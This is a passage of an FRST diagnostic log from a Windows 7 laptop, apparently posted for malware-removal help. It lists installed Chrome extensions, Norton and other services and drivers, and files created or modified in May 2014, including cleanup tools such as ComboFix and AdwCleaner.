CHR Extension: (Google Docs) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-25]
CHR Extension: (Google Drive) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-25]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-25]
CHR Extension: (YouTube) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-25]
CHR Extension: (Google Search) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-25]
CHR Extension: (Website Logon) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\debkinhcgejcbfgjiaalomcmkedjmiaa [2013-11-25]
CHR Extension: (Skype Click to Call) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2014-02-21]
CHR Extension: (Norton Identity Protection) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2013-11-25]
CHR Extension: (Google Wallet) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-25]
CHR Extension: (Gmail) - C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-25]
CHR HKLM-x32\...\Chrome\Extension: [debkinhcgejcbfgjiaalomcmkedjmiaa] - C:\Program Files (x86)\HP SimplePass 2012\tschrome.crx [2011-08-25]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-04-11]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\Exts\Chrome.crx [2014-05-16]

==================== Services (Whitelisted) =================

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390720 2014-04-11] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1764992 2014-04-11] (Microsoft Corporation)
R2 FPLService; C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe [260424 2011-08-26] (HP)
R2 irstrtsv; C:\Windows\SysWOW64\irstrtsv.exe [184320 2011-07-07] (Intel Corporation)
R2 MCLIENT; C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccSvcHst.exe [143928 2012-12-05] (Symantec Corporation)
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\NIS.exe [276376 2014-05-11] (Symantec Corporation)
R2 UI Assistant Service; C:\Program Files (x86)\SMART BRO\AssistantServices.exe [274760 2012-10-24] ()

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [133672 2011-09-21] (Broadcom Corporation.)
R3 BHDrvx64; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\BASHDefs\20140510.001\BHDrvx64.sys [1530160 2014-05-10] (Symantec Corporation)
R3 BTWDPAN; C:\Windows\System32\DRIVERS\btwdpan.sys [89640 2011-09-21] (Broadcom Corporation.)
R1 ccSet_MCLIENT; C:\Windows\system32\drivers\MCLIENTx64\0302020.00C\ccSetx64.sys [168096 2012-10-04] (Symantec Corporation)
R3 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1503000.00C\ccSetx64.sys [162392 2013-09-26] (Symantec Corporation)
R3 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [484952 2013-11-22] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [137648 2013-11-22] (Symantec Corporation)
R3 FLxHCIh; C:\Windows\System32\DRIVERS\FLxHCIh.sys [77040 2013-06-05] (Fresco Logic)
R3 IDSVia64; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140526.001\IDSvia64.sys [525016 2014-03-26] (Symantec Corporation)
R3 irstrtdv; C:\Windows\System32\DRIVERS\irstrtdv.sys [26504 2011-06-16] (Intel Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140526.022\ENG64.SYS [126040 2014-04-20] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\VirusDefs\20140526.022\EX64.SYS [2099288 2014-04-20] (Symantec Corporation)
R3 SRTSP; C:\Windows\System32\Drivers\NISx64\1503000.00C\SRTSP64.SYS [875736 2014-02-13] (Symantec Corporation)
R3 SRTSPX; C:\Windows\system32\drivers\NISx64\1503000.00C\SRTSPX64.SYS [36952 2013-09-10] (Symantec Corporation)
R3 SymDS; C:\Windows\system32\drivers\NISx64\1503000.00C\SYMDS64.SYS [493656 2013-09-10] (Symantec Corporation)
R3 SymEFA; C:\Windows\system32\drivers\NISx64\1503000.00C\SYMEFA64.SYS [1148120 2014-03-04] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2013-11-23] (Symantec Corporation)
R3 SymIRON; C:\Windows\system32\drivers\NISx64\1503000.00C\Ironx64.SYS [264280 2013-09-27] (Symantec Corporation)
R3 SymNetS; C:\Windows\System32\Drivers\NISx64\1503000.00C\SYMNETS.SYS [593112 2014-02-18] (Symantec Corporation)

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-05-27 17:09 - 2014-05-27 17:09 - 00062571 _____ () C:\Users\Hewlett Packard\Downloads\Shortcut.txt
2014-05-27 17:06 - 2014-05-27 17:06 - 00000000 ____D () C:\Users\Hewlett Packard\Downloads\FRST-OlderVersion
2014-05-27 16:42 - 2014-05-27 16:42 - 00086552 _____ () C:\Users\Hewlett Packard\AppData\Local\GDIPFONTCACHEV1.DAT
2014-05-27 16:16 - 2014-05-27 16:16 - 00343376 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-05-27 16:16 - 2014-05-27 16:16 - 00000056 _____ () C:\Windows\setupact.log
2014-05-27 16:16 - 2014-05-27 16:16 - 00000000 _____ () C:\Windows\setuperr.log
2014-05-27 15:38 - 2014-05-27 16:46 - 00021673 _____ () C:\Windows\WindowsUpdate.log
2014-05-27 13:04 - 2014-05-27 13:04 - 00033698 _____ () C:\ComboFix.txt
2014-05-27 12:37 - 2011-06-26 14:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-05-27 12:37 - 2010-11-08 01:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-05-27 12:37 - 2009-04-20 12:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00098816 _____ () C:\Windows\sed.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00080412 _____ () C:\Windows\grep.exe
2014-05-27 12:37 - 2000-08-31 08:00 - 00068096 _____ () C:\Windows\zip.exe
2014-05-27 12:35 - 2014-05-27 13:05 - 00000000 ____D () C:\Qoobox
2014-05-27 12:35 - 2014-05-27 12:59 - 00000000 ____D () C:\Windows\erdnt
2014-05-27 12:28 - 2014-05-27 12:28 - 05200919 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\username123.exe
2014-05-27 12:22 - 2014-05-27 12:22 - 01327971 _____ () C:\Users\Hewlett Packard\Downloads\adwcleaner_3.211.exe
2014-05-27 09:49 - 2014-05-27 09:49 - 00007606 _____ () C:\Users\Hewlett Packard\AppData\Local\Resmon.ResmonCfg
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233429.reg
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233404.reg
2014-05-26 23:33 - 2014-05-26 23:33 - 00012436 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233313.reg
2014-05-26 23:31 - 2014-05-26 23:32 - 00046014 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233124.reg
2014-05-25 20:12 - 2014-05-25 20:13 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\SkyCable
2014-05-25 18:58 - 2014-05-25 18:58 - 00001969 _____ () C:\Users\Public\Desktop\Samsung Kies 3.lnk
2014-05-25 18:58 - 2014-05-25 18:58 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\SelfMV
2014-05-25 18:58 - 2014-04-02 11:18 - 00144664 _____ (MAPILab Ltd. & Add-in Express Ltd.) C:\Windows\SysWOW64\secman.dll
2014-05-25 18:46 - 2014-04-11 16:39 - 00206080 _____ (DEVGURU Co., LTD.(www.devguru.co.kr)) C:\Windows\system32\Drivers\ssudmdm.sys
2014-05-25 18:46 - 2014-04-11 16:39 - 00110336 _____ (DEVGURU Co., LTD.(www.devguru.co.kr)) C:\Windows\system32\Drivers\ssudbus.sys
2014-05-25 07:19 - 2014-05-25 07:19 - 00002606 _____ () C:\Users\Hewlett Packard\Downloads\Rkill.txt
2014-05-25 07:01 - 2014-05-27 17:09 - 00031358 _____ () C:\Users\Hewlett Packard\Downloads\Addition.txt
2014-05-25 07:00 - 2014-05-27 17:10 - 00025415 _____ () C:\Users\Hewlett Packard\Downloads\FRST.txt
2014-05-25 06:57 - 2014-05-27 12:24 - 00000000 ____D () C:\AdwCleaner
2014-05-25 06:57 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-05-25 06:56 - 2014-05-27 17:10 - 00000000 ____D () C:\FRST
2014-05-25 06:55 - 2014-05-25 06:55 - 01940216 _____ (Bleeping Computer, LLC) C:\Users\Hewlett Packard\Downloads\rkill.exe
2014-05-25 06:48 - 2014-05-27 17:06 - 02066944 _____ (Farbar) C:\Users\Hewlett Packard\Downloads\FRST64.exe
2014-05-25 05:46 - 2014-05-27 09:29 - 00000000 ____D () C:\NPE
2014-05-25 05:44 - 2014-05-27 09:31 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\NPE
2014-05-25 05:14 - 2014-05-25 05:14 - 00041926 _____ () C:\Users\Hewlett Packard\Documents\cc_20140525_051401.reg
2014-05-25 04:13 - 2014-05-26 10:07 - 00003702 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-24 14:02 - 2014-05-24 14:02 - 00001137 _____ () C:\Users\Public\Desktop\Yahoo! Messenger.lnk
2014-05-24 14:02 - 2014-05-24 14:02 - 00000000 ____D () C:\ProgramData\Yahoo! Companion
2014-05-24 14:02 - 2014-05-24 14:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yahoo! Messenger
2014-05-23 18:58 - 2014-05-23 19:22 - 17917592 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Retirement.pptx
2014-05-23 18:57 - 2014-05-23 19:09 - 09242974 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Prospective Properties.pptx
2014-05-21 08:30 - 2014-05-21 08:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans
2014-05-20 23:55 - 2014-05-27 09:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YTD Video Downloader
2014-05-17 03:14 - 2014-05-06 12:40 - 23544320 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-05-17 03:14 - 2014-05-06 12:17 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-05-17 03:14 - 2014-05-06 11:25 - 17382912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-05-17 03:14 - 2014-05-06 11:07 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-05-17 03:14 - 2014-05-06 11:00 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-05-17 03:14 - 2014-05-06 10:10 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-05-16 23:20 - 2014-05-16 23:20 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Internet Security
2014-05-15 15:04 - 2014-05-09 14:14 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-05-15 15:04 - 2014-05-09 14:11 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-05-15 15:04 - 2014-04-12 10:22 - 00155072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2014-05-15 15:04 - 2014-04-12 10:22 - 00095680 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2014-05-15 15:04 - 2014-04-12 10:19 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2014-05-15 15:04 - 2014-04-12 10:19 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2014-05-15 15:04 - 2014-04-12 10:19 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2014-05-15 15:04 - 2014-04-12 10:12 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2014-05-15 15:04 - 2014-04-12 10:10 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2014-05-15 15:04 - 2014-03-25 10:43 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-05-15 15:04 - 2014-03-25 10:09 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-05-15 15:04 - 2014-03-04 17:47 - 05550016 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-05-15 15:04 - 2014-03-04 17:44 - 00728064 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00722944 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00424960 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-05-15 15:04 - 2014-03-04 17:44 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\wincredprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-05-15 15:04 - 2014-03-04 17:43 - 00057344 _____ (Microsoft Corporation) C:\Windows\system32\cngprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\adprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\capiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00052736 _____ (Microsoft Corporation) C:\Windows\system32\dpapiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00044544 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll
2014-05-15 15:04 - 2014-03-04 17:43 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-05-15 15:04 - 2014-03-04 17:20 - 03969984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-05-15 15:04 - 2014-03-04 17:20 - 03914176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-05-15 15:04 - 2014-03-04 17:17 - 00550912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00538112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\objsel.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cngprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\capiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpapiprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dimsroam.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wincredprovider.dll
2014-05-15 15:04 - 2014-03-04 17:17 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-05-15 15:04 - 2014-03-04 17:16 - 00274944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Oracle
2014-05-09 15:35 - 2014-05-09 15:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-05-07 09:22 - 2014-05-17 03:31 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-05-07 09:22 - 2014-05-07 09:22 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\DropboxMaster
2014-05-05 16:55 - 2014-05-05 16:55 - 00000031 _____ () C:\Users\Hewlett Packard\Desktop\dvr password.txt
2014-05-05 16:50 - 2014-05-05 16:52 - 00000000 ____D () C:\Program Files (x86)\DVRClient Plug-in
2014-05-05 16:50 - 2014-05-05 16:50 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVRClient Plug-in
2014-04-30 14:34 - 2014-04-30 14:34 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\Shinryo - MTR
2014-04-29 10:29 - 2014-05-20 09:28 - 00003662 _____ () C:\Windows\System32\Tasks\DTChk
2014-04-29 10:29 - 2014-05-20 09:28 - 00000000 ____D () C:\Users\Public\Util

==================== One Month Modified Files and Folders =======

2014-05-27 17:10 - 2014-05-25 07:00 - 00025415 _____ () C:\Users\Hewlett Packard\Downloads\FRST.txt
2014-05-27 17:10 - 2014-05-25 06:56 - 00000000 ____D () C:\FRST
2014-05-27 17:09 - 2014-05-27 17:09 - 00062571 _____ () C:\Users\Hewlett Packard\Downloads\Shortcut.txt
2014-05-27 17:09 - 2014-05-25 07:01 - 00031358 _____ () C:\Users\Hewlett Packard\Downloads\Addition.txt
2014-05-27 17:06 - 2014-05-27 17:06 - 00000000 ____D () C:\Users\Hewlett Packard\Downloads\FRST-OlderVersion
2014-05-27 17:06 - 2014-05-25 06:48 - 02066944 _____ (Farbar) C:\Users\Hewlett Packard\Downloads\FRST64.exe
2014-05-27 16:46 - 2014-05-27 15:38 - 00021673 _____ () C:\Windows\WindowsUpdate.log
2014-05-27 16:45 - 2013-05-13 14:14 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Skype
2014-05-27 16:42 - 2014-05-27 16:42 - 00086552 _____ () C:\Users\Hewlett Packard\AppData\Local\GDIPFONTCACHEV1.DAT
2014-05-27 16:41 - 2013-11-25 12:31 - 00000916 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-05-27 16:29 - 2013-05-31 13:28 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-05-27 16:29 - 2009-07-14 11:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-05-27 16:23 - 2009-07-14 12:45 - 00032064 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-05-27 16:23 - 2009-07-14 12:45 - 00032064 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-05-27 16:21 - 2009-07-14 13:13 - 00783400 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-05-27 16:16 - 2014-05-27 16:16 - 00343376 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-05-27 16:16 - 2014-05-27 16:16 - 00000056 _____ () C:\Windows\setupact.log
2014-05-27 16:16 - 2014-05-27 16:16 - 00000000 _____ () C:\Windows\setuperr.log
2014-05-27 16:16 - 2013-11-25 12:31 - 00000912 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-05-27 16:16 - 2013-06-04 13:38 - 00000000 ___RD () C:\Users\Hewlett Packard\Dropbox
2014-05-27 16:16 - 2013-06-04 13:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Dropbox
2014-05-27 16:16 - 2009-07-14 13:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-05-27 16:13 - 2013-10-31 21:39 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\Outlook Files
2014-05-27 13:21 - 2013-08-14 18:28 - 00000372 _____ () C:\Windows\Tasks\HPCeeScheduleForHewlett Packard.job
2014-05-27 13:05 - 2014-05-27 12:35 - 00000000 ____D () C:\Qoobox
2014-05-27 13:05 - 2014-04-23 09:28 - 00000000 ____D () C:\Users\dub_cm_auto
2014-05-27 13:05 - 2013-12-16 21:26 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Apps\2.0
2014-05-27 13:05 - 2012-03-03 10:14 - 00000000 ____D () C:\Users\Ralph Walker
2014-05-27 13:04 - 2014-05-27 13:04 - 00033698 _____ () C:\ComboFix.txt
2014-05-27 12:59 - 2014-05-27 12:35 - 00000000 ____D () C:\Windows\erdnt
2014-05-27 12:47 - 2009-07-14 10:34 - 00000215 _____ () C:\Windows\system.ini
2014-05-27 12:28 - 2014-05-27 12:28 - 05200919 ____R (Swearware) C:\Users\Hewlett Packard\Downloads\username123.exe
2014-05-27 12:24 - 2014-05-25 06:57 - 00000000 ____D () C:\AdwCleaner
2014-05-27 12:22 - 2014-05-27 12:22 - 01327971 _____ () C:\Users\Hewlett Packard\Downloads\adwcleaner_3.211.exe
2014-05-27 09:49 - 2014-05-27 09:49 - 00007606 _____ () C:\Users\Hewlett Packard\AppData\Local\Resmon.ResmonCfg
2014-05-27 09:38 - 2014-05-20 23:55 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YTD Video Downloader
2014-05-27 09:38 - 2013-12-30 05:17 - 00000000 ___RD () C:\Users\Hewlett Packard\Desktop\Technical 2014
2014-05-27 09:31 - 2014-05-25 05:44 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\NPE
2014-05-27 09:29 - 2014-05-25 05:46 - 00000000 ____D () C:\NPE
2014-05-27 03:19 - 2013-06-04 13:41 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Adobe
2014-05-27 00:17 - 2013-05-31 13:28 - 00692400 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-05-27 00:17 - 2013-05-31 13:28 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-05-27 00:17 - 2011-11-10 07:56 - 00070832 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2014-05-26 23:52 - 2014-01-15 00:02 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\Deployment
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233429.reg
2014-05-26 23:34 - 2014-05-26 23:34 - 00000632 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233404.reg
2014-05-26 23:33 - 2014-05-26 23:33 - 00012436 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233313.reg
2014-05-26 23:32 - 2014-05-26 23:31 - 00046014 _____ () C:\Users\Hewlett Packard\Documents\cc_20140526_233124.reg
2014-05-26 23:32 - 2013-05-07 15:41 - 00003990 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{D38877BA-A6DE-4B41-8821-353EF4B824FB}
2014-05-26 10:07 - 2014-05-25 04:13 - 00003702 _____ () C:\Windows\System32\Tasks\RegWrite
2014-05-26 01:24 - 2013-12-02 03:31 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\vlc
2014-05-25 20:13 - 2014-05-25 20:12 - 00000000 ____D () C:\Users\Hewlett Packard\Desktop\SkyCable
2014-05-25 19:15 - 2013-11-27 11:40 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\samsung
2014-05-25 18:58 - 2014-05-25 18:58 - 00001969 _____ () C:\Users\Public\Desktop\Samsung Kies 3.lnk
2014-05-25 18:58 - 2014-05-25 18:58 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\SelfMV
2014-05-25 18:58 - 2013-11-27 11:40 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Samsung
2014-05-25 18:58 - 2013-11-27 11:33 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2014-05-25 18:58 - 2013-11-27 11:32 - 00000000 ____D () C:\Program Files (x86)\Samsung
2014-05-25 18:58 - 2011-11-10 08:10 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-05-25 18:47 - 2013-11-27 11:40 - 00002002 _____ () C:\Users\Public\Desktop\Samsung Kies (Lite).lnk
2014-05-25 07:19 - 2014-05-25 07:19 - 00002606 _____ () C:\Users\Hewlett Packard\Downloads\Rkill.txt
2014-05-25 06:55 - 2014-05-25 06:55 - 01940216 _____ (Bleeping Computer, LLC) C:\Users\Hewlett Packard\Downloads\rkill.exe
2014-05-25 06:11 - 2013-05-07 15:40 - 00000000 ____D () C:\Users\Hewlett Packard
2014-05-25 05:45 - 2012-04-06 01:53 - 00000000 ____D () C:\ProgramData\Norton
2014-05-25 05:14 - 2014-05-25 05:14 - 00041926 _____ () C:\Users\Hewlett Packard\Documents\cc_20140525_051401.reg
2014-05-25 03:27 - 2013-12-02 03:31 - 00000258 __RSH () C:\Users\Hewlett Packard\ntuser.pol
2014-05-24 15:46 - 2013-12-03 10:18 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Local\CrashDumps
2014-05-24 14:55 - 2013-09-23 13:55 - 00000000 ____D () C:\Program Files\CCleaner
2014-05-24 14:02 - 2014-05-24 14:02 - 00001137 _____ () C:\Users\Public\Desktop\Yahoo! Messenger.lnk
2014-05-24 14:02 - 2014-05-24 14:02 - 00000000 ____D () C:\ProgramData\Yahoo! Companion
2014-05-24 14:02 - 2014-05-24 14:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Yahoo! Messenger
2014-05-24 14:02 - 2014-01-04 13:01 - 00000000 ____D () C:\ProgramData\Yahoo!
2014-05-24 14:02 - 2014-01-04 12:57 - 00000000 ____D () C:\Program Files (x86)\Yahoo!
2014-05-24 14:02 - 2013-06-14 19:46 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Yahoo!
2014-05-23 19:22 - 2014-05-23 18:58 - 17917592 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Retirement.pptx
2014-05-23 19:09 - 2014-05-23 18:57 - 09242974 _____ () C:\Users\Hewlett Packard\Desktop\Overall Presentation - Prospective Properties.pptx
2014-05-23 12:48 - 2013-11-25 12:33 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-05-21 09:06 - 2013-05-07 15:45 - 00000000 ____D () C:\Users\Hewlett Packard\Documents\Youcam
2014-05-21 08:30 - 2014-05-21 08:30 - 00000000 ____D () C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans
